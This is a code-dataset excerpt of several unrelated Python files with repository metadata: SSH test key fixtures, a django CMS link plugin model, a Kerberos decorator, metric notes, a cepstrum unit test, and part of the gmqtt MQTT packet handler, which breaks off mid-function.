b"\x00\x85K\x1bz\x9b\x12\x107\x9e\x1f\xad^\xda\xfe\xc6\x96\xfe\xdf5k\xb94"
b"\xe2\x16\x97\x92&\t\xbd\xbdp \x03\xa75\xbd-\x1b\xa0\xd2\x07G+\xd4\xde"
b"\xa8\xa8\x07\x07\x1b\xb8\x04 \xa7'A<l99\xe9A\xce\xe7\x17\x1d\xd1L\\\xbc="
b"\xd2&&\xfej\xd6\xfdHr\xaeF\xfa{\xc3\xd3\x19`D\x1d\xa5\x13\xa7\x80\xf5c)"
b"\xd4z]\x06\x07\x16]\xf6\x8b=\xcbd:\xe2\x84ZM\x8c\x06--\x9d\x1c\xeb\x83Lx"
b"=yT\xce\x00\x00\x00\x81\x00\xd9p\x06\xd8\xe2\xbc\xd4x\x91P\x94\xd4\xc1"
b"\x1b\x898lFdZQ\xa0\x9a\x07=H\x8f\x03Q\xcck\x12\x8e}\x1a\xb1e\xe7qu9\xe02"
b"\x05u\x8d\x18L\xaf\x93\xb1I\xb1f_xbz\xd1\x0c\xca\xe6MC\xb3\x9c\xf4k}\xe6"
b"\x0c\x98\xdc\xcf!b\x8e\xd5.\x12\xde\x04\xae\xd7$n\x831\xa2\x15\xa2D=\""
b"\xa9b&\"\xb9\xb2\xedT\n\x9d\x08\x83\xa7\x07\r\xff\x19\x18\x8e\xd8\xab"
b"\x1d\xdaH\x9c1h\x11\xa1fm\xe3\xd8\x1d\x00\x00\x00\x81\x00\xfbD\x17\x8b"
b"\xa46\xbe\x1e7\x1d\xa7\xf6al\x04\xc4\xaa\xddx>\x07\x8c\x1e3\x02\xae\x03"
b"\x14\x87\x83z\xe5\x9e}\x08g\xa8\xf2\xaa\xbf\x12p\xcfr\xa9\xa7\xc7\x0b"
b"\x1d\x88\xd5 \xfd\x9cc\xcaG0UN\x8b\xc4\xcf\xf4\x7f\x16\xa4\x92\x12t\xa1"
b"\t\xc2\xc4n\x9c\x8c3\xef\xa5\xe5\xf7\xe0+\xadO\\\x11\xaa\x1a\x847[\xfdz"
b"\xea\xc3\xcd|\xb0\xc8\xe4\x1fTc\xb5\xc7\xaf\xdf\xf4\t\xa7\xfc\xc7%\xfc\\"
b"\xe9\x91\xd7\x92\xc5\x98\x1eV\xd3\xb1#"
)
publicDSA_openssh = b"""\
ssh-dss AAAAB3NzaC1kc3MAAACBAJKQOsVERVDQIpANHH+JAAylo9\
LvFYmFFVMIuHFGlZpIL7sh3IMkqy+cssINM/lnHD3fmsAyLlUXZtt6PD9LgZRazsPOgptuH+Gu48G\
+yFuE8l0fVVUivos/MmYVJ66qT99htcZKatrTWZnpVW7gFABoqw+he2LZ0gkeU0+Sx9a5AAAAFQD0\
EYmTNaFJ8CS0+vFSF4nYcyEnSQAAAIEAkgLjxHJAE7qFWdTqf7EZngu7jAGmdB9k3YzMHe1ldMxEB\
7zNw5aOnxjhoYLtiHeoEcOk2XOyvnE+VfhIWwWAdOiKRTEZlmizkvhGbq0DCe2EPMXirjqWACI5nD\
ioQX1oEMonR8N3AEO5v9SfBqS2Q9R6OBr6lf04RvwpHZ0UGu8AAACAAhRpxGMIWEyaEh8YnjiazQT\
NEpklRZqeBGo1gotJggNmVaIQNIClGlLyCi359efEUuQcZ9SXxM59P+hecc/GU/GHakW5YWE4dP2G\
gdgMQWC7S6WFIXePGGXqNQDdWxlX8umhenvQqa1PnKrFRhDrJw8Z7GjdHxflsxCEmXPoLN8= \
comment\
"""
privateDSA_openssh = b"""\
-----BEGIN DSA PRIVATE KEY-----
MIIBvAIBAAKBgQCSkDrFREVQ0CKQDRx/iQAMpaPS7xWJhRVTCLhxRpWaSC+7IdyD
JKsvnLLCDTP5Zxw935rAMi5VF2bbejw/S4GUWs7DzoKbbh/hruPBvshbhPJdH1VV
Ir6LPzJmFSeuqk/fYbXGSmra01mZ6VVu4BQAaKsPoXti2dIJHlNPksfWuQIVAPQR
iZM1oUnwJLT68VIXidhzISdJAoGBAJIC48RyQBO6hVnU6n+xGZ4Lu4wBpnQfZN2M
zB3tZXTMRAe8zcOWjp8Y4aGC7Yh3qBHDpNlzsr5xPlX4SFsFgHToikUxGZZos5L4
Rm6tAwnthDzF4q46lgAiOZw4qEF9aBDKJ0fDdwBDub/UnwaktkPUejga+pX9OEb8
KR2dFBrvAoGAAhRpxGMIWEyaEh8YnjiazQTNEpklRZqeBGo1gotJggNmVaIQNICl
GlLyCi359efEUuQcZ9SXxM59P+hecc/GU/GHakW5YWE4dP2GgdgMQWC7S6WFIXeP
GGXqNQDdWxlX8umhenvQqa1PnKrFRhDrJw8Z7GjdHxflsxCEmXPoLN8CFQDV2gbL
czUdxCus0pfEP1bddaXRLQ==
-----END DSA PRIVATE KEY-----\
"""
publicDSA_lsh = decodebytes(b"""\
e0tERXdPbkIxWW14cFl5MXJaWGtvTXpwa2MyRW9NVHB3TVRJNU9nQ1NrRHJGUkVWUTBDS1FEUngv
aVFBTXBhUFM3eFdKaFJWVENMaHhScFdhU0MrN0lkeURKS3N2bkxMQ0RUUDVaeHc5MzVyQU1pNVZG
MmJiZWp3L1M0R1VXczdEem9LYmJoL2hydVBCdnNoYmhQSmRIMVZWSXI2TFB6Sm1GU2V1cWsvZlli
WEdTbXJhMDFtWjZWVnU0QlFBYUtzUG9YdGkyZElKSGxOUGtzZld1U2tvTVRweE1qRTZBUFFSaVpN
MW9VbndKTFQ2OFZJWGlkaHpJU2RKS1NneE9tY3hNams2QUpJQzQ4UnlRQk82aFZuVTZuK3hHWjRM
dTR3QnBuUWZaTjJNekIzdFpYVE1SQWU4emNPV2pwOFk0YUdDN1loM3FCSERwTmx6c3I1eFBsWDRT
RnNGZ0hUb2lrVXhHWlpvczVMNFJtNnRBd250aER6RjRxNDZsZ0FpT1p3NHFFRjlhQkRLSjBmRGR3
QkR1Yi9Vbndha3RrUFVlamdhK3BYOU9FYjhLUjJkRkJydktTZ3hPbmt4TWpnNkFoUnB4R01JV0V5
YUVoOFluamlhelFUTkVwa2xSWnFlQkdvMWdvdEpnZ05tVmFJUU5JQ2xHbEx5Q2kzNTllZkVVdVFj
WjlTWHhNNTlQK2hlY2MvR1UvR0hha1c1WVdFNGRQMkdnZGdNUVdDN1M2V0ZJWGVQR0dYcU5RRGRX
eGxYOHVtaGVudlFxYTFQbktyRlJoRHJKdzhaN0dqZEh4ZmxzeENFbVhQb0xOOHBLU2s9fQ==
""")
privateDSA_lsh = decodebytes(b"""\
KDExOnByaXZhdGUta2V5KDM6ZHNhKDE6cDEyOToAkpA6xURFUNAikA0cf4kADKWj0u8ViYUVUwi4
cUaVmkgvuyHcgySrL5yywg0z+WccPd+awDIuVRdm23o8P0uBlFrOw86Cm24f4a7jwb7IW4TyXR9V
VSK+iz8yZhUnrqpP32G1xkpq2tNZmelVbuAUAGirD6F7YtnSCR5TT5LH1rkpKDE6cTIxOgD0EYmT
NaFJ8CS0+vFSF4nYcyEnSSkoMTpnMTI5OgCSAuPEckATuoVZ1Op/sRmeC7uMAaZ0H2TdjMwd7WV0
zEQHvM3Dlo6fGOGhgu2Id6gRw6TZc7K+cT5V+EhbBYB06IpFMRmWaLOS+EZurQMJ7YQ8xeKuOpYA
IjmcOKhBfWgQyidHw3cAQ7m/1J8GpLZD1Ho4GvqV/ThG/CkdnRQa7ykoMTp5MTI4OgIUacRjCFhM
mhIfGJ44ms0EzRKZJUWangRqNYKLSYIDZlWiEDSApRpS8got+fXnxFLkHGfUl8TOfT/oXnHPxlPx
h2pFuWFhOHT9hoHYDEFgu0ulhSF3jxhl6jUA3VsZV/LpoXp70KmtT5yqxUYQ6ycPGexo3R8X5bMQ
hJlz6CzfKSgxOngyMToA1doGy3M1HcQrrNKXxD9W3XWl0S0pKSk=
""")
privateDSA_agentv3 = decodebytes(b"""\
AAAAB3NzaC1kc3MAAACBAJKQOsVERVDQIpANHH+JAAylo9LvFYmFFVMIuHFGlZpIL7sh3IMkqy+c
ssINM/lnHD3fmsAyLlUXZtt6PD9LgZRazsPOgptuH+Gu48G+yFuE8l0fVVUivos/MmYVJ66qT99h
tcZKatrTWZnpVW7gFABoqw+he2LZ0gkeU0+Sx9a5AAAAFQD0EYmTNaFJ8CS0+vFSF4nYcyEnSQAA
AIEAkgLjxHJAE7qFWdTqf7EZngu7jAGmdB9k3YzMHe1ldMxEB7zNw5aOnxjhoYLtiHeoEcOk2XOy
vnE+VfhIWwWAdOiKRTEZlmizkvhGbq0DCe2EPMXirjqWACI5nDioQX1oEMonR8N3AEO5v9SfBqS2
Q9R6OBr6lf04RvwpHZ0UGu8AAACAAhRpxGMIWEyaEh8YnjiazQTNEpklRZqeBGo1gotJggNmVaIQ
NIClGlLyCi359efEUuQcZ9SXxM59P+hecc/GU/GHakW5YWE4dP2GgdgMQWC7S6WFIXePGGXqNQDd
WxlX8umhenvQqa1PnKrFRhDrJw8Z7GjdHxflsxCEmXPoLN8AAAAVANXaBstzNR3EK6zSl8Q/Vt11
pdEt
""")
__all__ = ['DSAData', 'RSAData', 'privateDSA_agentv3', 'privateDSA_lsh',
'privateDSA_openssh', 'privateRSA_agentv3', 'privateRSA_lsh',
'privateRSA_openssh', 'publicDSA_lsh', 'publicDSA_openssh',
'publicRSA_lsh', 'publicRSA_openssh', 'privateRSA_openssh_alternate']
| 61.058559 | 92 | 0.819993 |
1c4a75959aba89da3bf8a9fad406f6e1008f3883 | 7,491 | py | Python | cmsplugin_filer_link2/models.py | tobifroe/djangocms-link2 | 75780b0259df5d403b4648522404cae9768f76d2 | ["BSD-3-Clause"] | null | null | null | cmsplugin_filer_link2/models.py | tobifroe/djangocms-link2 | 75780b0259df5d403b4648522404cae9768f76d2 | ["BSD-3-Clause"] | null | null | null | cmsplugin_filer_link2/models.py | tobifroe/djangocms-link2 | 75780b0259df5d403b4648522404cae9768f76d2 | ["BSD-3-Clause"] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.core.exceptions import ObjectDoesNotExist, ValidationError
from django.urls.exceptions import NoReverseMatch
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
from django.utils.html import escape
from django.utils.safestring import mark_safe
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
from cms.models import CMSPlugin
from filer.fields.file import FilerFileField
from djangocms_attributes_field.fields import AttributesField
from cmsplugin_filer_link2.fields import Select2PageField
from cmsplugin_filer_link2.validators import validate_anchor_id
DEFAULT_LINK_STYLES = (
    (" ", "Default"),
)
LINK_STYLES = getattr(settings, "FILER_LINK_STYLES", DEFAULT_LINK_STYLES)
EXCLUDED_KEYS = ['class', 'href', 'target', ]
@python_2_unicode_compatible
class FilerLink2Plugin(CMSPlugin):
name = models.CharField(_('name'), max_length=255)
url = models.CharField(_('url'), blank=True, null=True, max_length=2000,
help_text=_('The url must specify the protocol, e.g. https://DOMAIN.tld'))
page_link = Select2PageField(
verbose_name=_('page'),
blank=True,
null=True,
on_delete=models.SET_NULL,
)
persistent_page_link = models.CharField(_('internal url'), blank=True, null=True, max_length=2000)
mailto = models.EmailField(_('mailto'), blank=True, null=True, max_length=254)
link_style = models.CharField(_('link style'), max_length=255,
choices=LINK_STYLES, default=LINK_STYLES[0][0])
new_window = models.BooleanField(_('new window?'), default=False,
help_text=_('Do you want this link to open a new window?'))
file = FilerFileField(blank=True, null=True, on_delete=models.SET_NULL)
link_attributes = AttributesField(excluded_keys=EXCLUDED_KEYS, blank=True,
help_text=_('Optional. Adds HTML attributes to the rendered link.'))
encrypt_mailto = models.BooleanField(_('Encryption of Mailto'), default=False,
help_text=_('Encrypt the mailto, as protection against bots collecting mails '
'addresses.'))
anchor_id = models.CharField(
_('Anchor ID'),
blank=True,
max_length=100,
validators=[validate_anchor_id]
)
cmsplugin_ptr = models.OneToOneField(
to=CMSPlugin,
on_delete=models.CASCADE,
related_name='%(app_label)s_%(class)s',
parent_link=True,
)
def __str__(self):
return self.name
def clean(self):
super(FilerLink2Plugin, self).clean()
configured_destinations = [d for d in
('url', 'page_link', 'mailto', 'file')
if getattr(self, d) is not None and getattr(self, d) != '']
if len(configured_destinations) == 0:
raise ValidationError(_('Please choose a destination'))
elif len(configured_destinations) > 1:
raise ValidationError(
_('Please only choose one destination! You set: {}'.format(', '.join(configured_destinations))))
def save(self, *args, **kwargs):
super(FilerLink2Plugin, self).save(*args, **kwargs)
# delete link health state
LinkHealthState.objects.filter(link=self).delete()
def get_encrypted_mailto(self):
name, domain = self.mailto.split('@')
return 'javascript:window.location.href = \'mailto:\' + [\'{}\', \'{}\'].join(\'@\')'.format(name, domain)
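    # get_encrypted_mailto example: 'user@example.com' yields
    # "javascript:window.location.href = 'mailto:' + ['user', 'example.com'].join('@')"
    # so the address is only assembled in the browser, not in the page source.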
def get_name(self):
if self.encrypt_mailto and self.mailto:
if self.name == self.mailto:
name, domain = self.name.split('@')
# escape name and domain for security reasons
return mark_safe('{}<!---->@<!---->{}'.format(escape(name), escape(domain)))
else:
return self.name
def get_link(self):
if self.file:
link = self.file.url
elif self.mailto:
if self.encrypt_mailto:
link = _(self.get_encrypted_mailto())
else:
link = 'mailto:{}'.format(_(self.mailto))
elif self.url:
link = _(self.url)
elif self.page_link:
try:
link = self.page_link.get_absolute_url()
except NoReverseMatch:
# if this internal link doesn't work anymore, we mark it not reachable
self.set_linkstate(LinkHealthState.NOT_REACHABLE)
# return old internal link and send user to 404
link = self.persistent_page_link
else:
# check if the target page has been moved or renamed and update accordingly
if link != self.persistent_page_link:
self.persistent_page_link = link
self.save()
elif self.persistent_page_link:
# happens when this link instance pointed to a removed page
self.set_linkstate(LinkHealthState.NOT_REACHABLE)
link = self.persistent_page_link
else:
link = ''
# Append anchor ID to url
if self.anchor_id:
link += '#{}'.format(self.anchor_id)
return link or ''
def set_linkstate(self, state):
if state is None:
LinkHealthState.objects.filter(link=self).delete()
else:
LinkHealthState.objects.update_or_create(link=self, defaults={'state': state})
def get_linkstate(self):
try:
return self.linkhealth.state
except ObjectDoesNotExist:
return None
@property
def active_destination(self):
""" The active destination determines which destination tab should be set to active. If the field is not set
yet, we return None
:return: field_name: str
"""
configured_destinations = [d for d in
('url', 'page_link', 'mailto', 'file')
if getattr(self, d) is not None and getattr(self, d) != '']
if len(configured_destinations) == 0:
return None
return configured_destinations[0]
@python_2_unicode_compatible
class LinkHealthState(models.Model):
NOT_REACHABLE = '4xx'
REDIRECT = '3xx'
SERVER_ERROR = '5xx'
BAD_CONFIGURED = 'bad'
TIMEOUT = 'to'
LINK_STATES = (
(REDIRECT, _('Redirected')),
(NOT_REACHABLE, _('Not reachable')),
(SERVER_ERROR, _('Server error')),
(BAD_CONFIGURED, _('Badly configured')),
(TIMEOUT, _('Timeout')),
)
link = models.OneToOneField(
FilerLink2Plugin,
on_delete=models.CASCADE,
unique=True,
related_name='linkhealth',
verbose_name=_('Link name')
)
state = models.CharField(max_length=3, choices=LINK_STATES, verbose_name=_('State'))
detected = models.DateTimeField(auto_now=True, verbose_name=_('Detected on'),
help_text=_('Date and time when the faulty link state was detected.'))
def __str__(self):
return _(u'Link state for: {}').format(self.link.name)
class Meta:
verbose_name = _('Link Health State')
verbose_name_plural = _('Link Health States')
1c4a75e892d60a1d12ff20ec2dff431ecbc0002b | 257 | py | Python | lib/errata/decorators.py | adarshtri/art-dashboard-server | c6c61147d49aa43b6e2892ce07d8a115c1478b0c | ["Apache-2.0"] | 1 | 2020-09-21T06:48:47.000Z | 2020-09-21T06:48:47.000Z | lib/errata/decorators.py | adarshtri/art-dashboard-server | c6c61147d49aa43b6e2892ce07d8a115c1478b0c | ["Apache-2.0"] | 5 | 2021-02-05T19:43:08.000Z | 2021-06-04T23:23:29.000Z | lib/errata/decorators.py | adarshtri/art-dashboard-server | c6c61147d49aa43b6e2892ce07d8a115c1478b0c | ["Apache-2.0"] | 6 | 2021-02-06T07:21:37.000Z | 2021-06-07T12:40:37.000Z |
from lib.errata.kerberos import handle_kinit
import functools
def update_keytab(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
handle_kinit()
func_ret = func(*args, **kwargs)
return func_ret
return wrapper
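# Usage sketch (hypothetical caller): any function that talks to Errata can be
# decorated so a fresh Kerberos ticket is acquired via kinit before it runs, e.g.
#
# @update_keytab
# def fetch_advisory(advisory_id):
#     ...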
1c4a76055960b4b25afce3760c920e7649074f56 | 516 | py | Python | Evulation_Script.py | OpenVessel/RedTinSaintBernard-for-BraTS2021-challenge | dafe6f33ff6269869377d01a014ab1528b0f1c1d | ["MIT"] | null | null | null | Evulation_Script.py | OpenVessel/RedTinSaintBernard-for-BraTS2021-challenge | dafe6f33ff6269869377d01a014ab1528b0f1c1d | ["MIT"] | null | null | null | Evulation_Script.py | OpenVessel/RedTinSaintBernard-for-BraTS2021-challenge | dafe6f33ff6269869377d01a014ab1528b0f1c1d | ["MIT"] | null | null | null |
### How the output of the model will be evulated is with
## Dice score
##
#https://pypi.org/project/MedPy/0.4.0/
## https://loli.github.io/medpy/_modules/medpy/metric/binary.html
### HAUSDORFF DISTANCE
###https://en.wikipedia.org/wiki/Hausdorff_distance
## https://en.wikipedia.org/wiki/S%C3%B8rensen%E2%80%93Dice_coefficient
## DICE SCORE
# https://docs.scipy.org/doc/scipy/reference/generated/scipy.spatial.distance.dice.html
# https://www.kaggle.com/c/understanding_cloud_organization/discussion/114093 | 28.666667 | 87 | 0.753876 | true | true |
|
1c4a763ee76b213d17c59a4865ede3a3b254073f | 1,805 | py | Python | delta/data/frontend/cepstrum_test.py | luffywalf/delta | 7eb4e3be578a680737616efff6858d280595ff48 | ["Apache-2.0"] | 1 | 2019-10-27T08:15:22.000Z | 2019-10-27T08:15:22.000Z | delta/data/frontend/cepstrum_test.py | luffywalf/delta | 7eb4e3be578a680737616efff6858d280595ff48 | ["Apache-2.0"] | null | null | null | delta/data/frontend/cepstrum_test.py | luffywalf/delta | 7eb4e3be578a680737616efff6858d280595ff48 | ["Apache-2.0"] | null | null | null |
# Copyright (C) 2017 Beijing Didi Infinity Technology and Development Co.,Ltd.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import tensorflow as tf
import os
from pathlib import Path
from delta.data.frontend.read_wav import ReadWav
from delta.data.frontend.cepstrum import Cepstrum
import numpy as np
class CepstrumTest(tf.test.TestCase):
def test_cepstrum(self):
wav_path = str(
Path(os.environ['MAIN_ROOT']).joinpath('delta/layers/ops/data/sm1_cln.wav'))
with self.session():
read_wav = ReadWav.params().instantiate()
input_data, sample_rate = read_wav.call(wav_path)
cepstrum = Cepstrum.params({'window_length':0.025}).instantiate()
cepstrum_test = cepstrum(input_data, sample_rate)
output_true = np.array(
[[0.525808, 0.579537, 0.159656, 0.014726, -0.1866810],
[0.225988, 1.557304, 3.381828, 0.132935, 0.7128600],
[-1.832759, -1.045178, 0.753158, 0.116107, -0.9307780],
[-0.696277, 1.333355, 1.590942, 2.041829, -0.0805630],
[-0.377375, 2.984320, 0.036302, 3.676640, 1.1709290]])
self.assertAllClose(cepstrum_test.eval()[15:20, 7:12], output_true)
if __name__ == '__main__':
tf.test.main()
1c4a77766df324feef1c4233c8317b9f927125b0 | 14,874 | py | Python | gmqtt/mqtt/handler.py | liamdiprose/gmqtt | 4fb92a9629fc57c885f5e07c46b951c4f45e9572 | ["MIT"] | null | null | null | gmqtt/mqtt/handler.py | liamdiprose/gmqtt | 4fb92a9629fc57c885f5e07c46b951c4f45e9572 | ["MIT"] | null | null | null | gmqtt/mqtt/handler.py | liamdiprose/gmqtt | 4fb92a9629fc57c885f5e07c46b951c4f45e9572 | ["MIT"] | null | null | null |
import asyncio
import logging
import struct
import time
from asyncio import iscoroutinefunction
from collections import defaultdict
from copy import deepcopy
from functools import partial
from .utils import unpack_variable_byte_integer, IdGenerator, run_coroutine_or_function
from .property import Property
from .protocol import MQTTProtocol
from .constants import MQTTCommands, PubAckReasonCode, PubRecReasonCode, DEFAULT_CONFIG
from .constants import MQTTv311, MQTTv50
logger = logging.getLogger(__name__)
def _empty_callback(*args, **kwargs):
pass
class MQTTError(Exception):
pass
class MQTTConnectError(MQTTError):
__messages__ = {
1: "Connection Refused: unacceptable protocol version",
2: "Connection Refused: identifier rejected",
3: "Connection Refused: broker unavailable",
4: "Connection Refused: bad user name or password",
5: "Connection Refused: not authorised",
10: 'Cannot handle CONNACK package',
128: "Connection Refused: Unspecified error",
129: "Connection Refused: Malformed Packet",
130: "Connection Refused: Protocol Error",
131: "Connection Refused: Implementation specific error",
132: "Connection Refused: Unsupported Protocol Version",
133: "Connection Refused: Client Identifier not valid",
134: "Connection Refused: Bad User Name or Password",
135: "Connection Refused: Not authorized",
136: "Connection Refused: Server unavailable",
137: "Connection Refused: Server busy",
138: "Connection Refused: Banned",
140: "Connection Refused: Bad authentication method",
144: "Connection Refused: Topic Name invalid",
149: "Connection Refused: Packet too large",
151: "Connection Refused: Quota exceeded",
153: "Connection Refused: Payload format invalid",
154: "Connection Refused: Retain not supported",
155: "Connection Refused: QoS not supported",
156: "Connection Refused: Use another server",
157: "Connection Refused: Server moved",
159: "Connection Refused: Connection rate exceeded",
}
def __init__(self, code):
self._code = code
        self.message = self.__messages__.get(code, 'Unknown error')
def __str__(self):
return "code {} ({})".format(self._code, self.message)
class EventCallback(object):
def __init__(self, *args, **kwargs):
super(EventCallback, self).__init__()
self._connected = asyncio.Event()
self._on_connected_callback = _empty_callback
self._on_disconnected_callback = _empty_callback
self._on_message_callback = _empty_callback
self._on_subscribe_callback = _empty_callback
self._on_unsubscribe_callback = _empty_callback
self._config = deepcopy(DEFAULT_CONFIG)
self._reconnects_config_cache = None
self.failed_connections = 0
def _temporatily_stop_reconnect(self):
self._reconnects_config_cache = self._config['reconnect_retries']
self.stop_reconnect()
def _restore_config(self):
if self._reconnects_config_cache is not None:
self._config['reconnect_retries'] = self._reconnects_config_cache
def stop_reconnect(self):
self._config['reconnect_retries'] = 0
def set_config(self, config):
self._config.update(config)
@property
def _reconnect(self):
if self.reconnect_retries == -1:
return True
return bool(self.reconnect_retries)
@property
def reconnect_delay(self):
return self._config['reconnect_delay']
@property
def reconnect_retries(self):
return self._config['reconnect_retries']
@property
def on_subscribe(self):
return self._on_subscribe_callback
@on_subscribe.setter
def on_subscribe(self, cb):
if not callable(cb):
raise ValueError
self._on_subscribe_callback = cb
@property
def on_connect(self):
return self._on_connected_callback
@on_connect.setter
def on_connect(self, cb):
if not callable(cb):
raise ValueError
self._on_connected_callback = cb
@property
def on_message(self):
return self._on_message_callback
@on_message.setter
def on_message(self, cb):
if not callable(cb):
raise ValueError
self._on_message_callback = cb
@property
def on_disconnect(self):
return self._on_disconnected_callback
@on_disconnect.setter
def on_disconnect(self, cb):
if not callable(cb):
raise ValueError
self._on_disconnected_callback = cb
@property
def on_unsubscribe(self):
return self._on_unsubscribe_callback
@on_unsubscribe.setter
def on_unsubscribe(self, cb):
if not callable(cb):
raise ValueError
self._on_unsubscribe_callback = cb
class MqttPackageHandler(EventCallback):
def __init__(self, *args, **kwargs):
super(MqttPackageHandler, self).__init__(*args, **kwargs)
self._messages_in = {}
self._handler_cache = {}
self._error = None
self._connection = None
self._id_generator = IdGenerator(max=kwargs.get('receive_maximum', 65535))
if self.protocol_version == MQTTv50:
self._optimistic_acknowledgement = kwargs.get('optimistic_acknowledgement', True)
else:
self._optimistic_acknowledgement = True
def _send_command_with_mid(self, cmd, mid, dup, reason_code=0):
raise NotImplementedError
def _remove_message_from_query(self, mid):
raise NotImplementedError
def _send_puback(self, mid, reason_code=0):
self._send_command_with_mid(MQTTCommands.PUBACK, mid, False, reason_code=reason_code)
def _send_pubrec(self, mid, reason_code=0):
self._send_command_with_mid(MQTTCommands.PUBREC, mid, False, reason_code=reason_code)
def _send_pubrel(self, mid, dup, reason_code=0):
self._send_command_with_mid(MQTTCommands.PUBREL | 2, mid, dup, reason_code=reason_code)
def __get_handler__(self, cmd):
cmd_type = cmd & 0xF0
if cmd_type not in self._handler_cache:
handler_name = '_handle_{}_packet'.format(MQTTCommands(cmd_type).name.lower())
self._handler_cache[cmd_type] = getattr(self, handler_name, self._default_handler)
return self._handler_cache[cmd_type]
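        # e.g. cmd 0x32 (PUBLISH with QoS 1) masks to 0x30 and resolves to
        # self._handle_publish_packet via the cached name lookup above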
def _handle_packet(self, cmd, packet):
logger.debug('[CMD %s] %s', hex(cmd), packet)
handler = self.__get_handler__(cmd)
handler(cmd, packet)
self._last_msg_in = time.monotonic()
def _handle_exception_in_future(self, future):
if not future.exception():
return
self.on_disconnect(self, packet=None, exc=future.exception())
def _default_handler(self, cmd, packet):
logger.warning('[UNKNOWN CMD] %s %s', hex(cmd), packet)
def _handle_disconnect_packet(self, cmd, packet):
if self._reconnect:
future = asyncio.ensure_future(self.reconnect(delay=True))
future.add_done_callback(self._handle_exception_in_future)
self.on_disconnect(self, packet)
def _parse_properties(self, packet):
if self.protocol_version < MQTTv50:
            # If the protocol version is less than 5.0, there are no properties in the packet
return {}, packet
properties_len, left_packet = unpack_variable_byte_integer(packet)
packet = left_packet[:properties_len]
left_packet = left_packet[properties_len:]
properties_dict = defaultdict(list)
while packet:
property_identifier, = struct.unpack("!B", packet[:1])
property_obj = Property.factory(id_=property_identifier)
if property_obj is None:
logger.critical('[PROPERTIES] received invalid property id {}, disconnecting'.format(property_identifier))
return None, None
result, packet = property_obj.loads(packet[1:])
for k, v in result.items():
properties_dict[k].append(v)
properties_dict = dict(properties_dict)
return properties_dict, left_packet
def _handle_connack_packet(self, cmd, packet):
self._connected.set()
(flags, result) = struct.unpack("!BB", packet[:2])
if result != 0:
logger.warning('[CONNACK] %s', hex(result))
self.failed_connections += 1
if result == 1 and self.protocol_version == MQTTv50:
logger.info('[CONNACK] Downgrading to MQTT 3.1 protocol version')
MQTTProtocol.proto_ver = MQTTv311
future = asyncio.ensure_future(self.reconnect(delay=True))
future.add_done_callback(self._handle_exception_in_future)
return
else:
self._error = MQTTConnectError(result)
if self._reconnect:
asyncio.ensure_future(self.reconnect(delay=True))
return
else:
self.failed_connections = 0
if len(packet) > 2:
properties, _ = self._parse_properties(packet[2:])
if properties is None:
self._error = MQTTConnectError(10)
asyncio.ensure_future(self.disconnect())
self._connack_properties = properties
# TODO: Implement checking for the flags and results
# see 3.2.2.3 Connect Return code of the http://docs.oasis-open.org/mqtt/mqtt/v3.1.1/os/mqtt-v3.1.1-os.pdf
logger.debug('[CONNACK] flags: %s, result: %s', hex(flags), hex(result))
self.on_connect(self, flags, result, self.properties)
def _handle_publish_packet(self, cmd, raw_packet):
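        # Remaining packet layout after the fixed header: 2-byte topic length,
        # topic, a 2-byte packet id when QoS > 0, optional MQTT 5 properties,
        # then the application payload.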
header = cmd
dup = (header & 0x08) >> 3
qos = (header & 0x06) >> 1
retain = header & 0x01
pack_format = "!H" + str(len(raw_packet) - 2) + 's'
(slen, packet) = struct.unpack(pack_format, raw_packet)
pack_format = '!' + str(slen) + 's' + str(len(packet) - slen) + 's'
(topic, packet) = struct.unpack(pack_format, packet)
if not topic:
logger.warning('[MQTT ERR PROTO] topic name is empty')
return
try:
print_topic = topic.decode('utf-8')
except UnicodeDecodeError as exc:
logger.warning('[INVALID CHARACTER IN TOPIC] %s', topic, exc_info=exc)
print_topic = topic
payload = packet
logger.debug('[RECV %s with QoS: %s] %s', print_topic, qos, payload)
if qos > 0:
pack_format = "!H" + str(len(packet) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, packet)
else:
mid = None
properties, packet = self._parse_properties(packet)
properties['dup'] = dup
properties['retain'] = retain
if packet is None:
logger.critical('[INVALID MESSAGE] skipping: {}'.format(raw_packet))
return
if qos == 0:
run_coroutine_or_function(self.on_message, self, print_topic, packet, qos, properties)
elif qos == 1:
self._handle_qos_1_publish_packet(mid, packet, print_topic, properties)
elif qos == 2:
self._handle_qos_2_publish_packet(mid, packet, print_topic, properties)
self._id_generator.free_id(mid)
def _handle_qos_2_publish_packet(self, mid, packet, print_topic, properties):
if self._optimistic_acknowledgement:
self._send_pubrec(mid)
run_coroutine_or_function(self.on_message, self, print_topic, packet, 2, properties)
else:
run_coroutine_or_function(self.on_message, self, print_topic, packet, 2, properties,
callback=partial(self.__handle_publish_callback, qos=2, mid=mid))
def __handle_publish_callback(self, f, qos=None, mid=None):
reason_code = f.result()
if reason_code not in (c.value for c in PubRecReasonCode):
raise ValueError('Invalid PUBREC reason code {}'.format(reason_code))
if qos == 2:
self._send_pubrec(mid, reason_code=reason_code)
else:
self._send_puback(mid, reason_code=reason_code)
self._id_generator.free_id(mid)
def _handle_qos_1_publish_packet(self, mid, packet, print_topic, properties):
if self._optimistic_acknowledgement:
self._send_puback(mid)
run_coroutine_or_function(self.on_message, self, print_topic, packet, 1, properties)
else:
run_coroutine_or_function(self.on_message, self, print_topic, packet, 1, properties,
callback=partial(self.__handle_publish_callback, qos=1, mid=mid))
def __call__(self, cmd, packet):
try:
result = self._handle_packet(cmd, packet)
except Exception as exc:
logger.error('[ERROR HANDLE PKG]', exc_info=exc)
result = None
return result
def _handle_suback_packet(self, cmd, raw_packet):
pack_format = "!H" + str(len(raw_packet) - 2) + 's'
(mid, packet) = struct.unpack(pack_format, raw_packet)
pack_format = "!" + "B" * len(packet)
granted_qos = struct.unpack(pack_format, packet)
logger.info('[SUBACK] %s %s', mid, granted_qos)
self.on_subscribe(self, mid, granted_qos)
self._id_generator.free_id(mid)
def _handle_unsuback_packet(self, cmd, raw_packet):
pack_format = "!H" + str(len(raw_packet) - 2) + 's'
